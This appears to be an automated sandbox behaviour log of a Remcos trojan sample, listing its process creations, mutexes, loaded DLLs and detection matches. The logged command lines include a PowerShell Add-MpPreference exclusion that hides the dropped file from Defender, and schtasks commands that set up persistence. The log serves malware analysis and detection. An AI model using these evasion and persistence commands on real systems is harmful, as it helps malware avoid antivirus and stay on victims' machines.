          Source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 6204, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: bmkNCLNkqvOpVZ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, PpYJNMfTau1IasRZRx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, PpYJNMfTau1IasRZRx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, gM7HF6pf6lrBLxHo57.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, gM7HF6pf6lrBLxHo57.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, gM7HF6pf6lrBLxHo57.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, gM7HF6pf6lrBLxHo57.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, gM7HF6pf6lrBLxHo57.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, gM7HF6pf6lrBLxHo57.csSecurity API names: _0020.AddAccessRule
          Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@18/12@1/2
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,14_2_00415C90
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,14_2_0040E2E7
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,14_2_00419493
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_00418A00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeFile created: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeMutant created: \Sessions\1\BaseNamedObjects\765-8M14I5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB7C4.tmpJump to behavior
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeVirustotal: Detection: 32%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess created: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess created: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
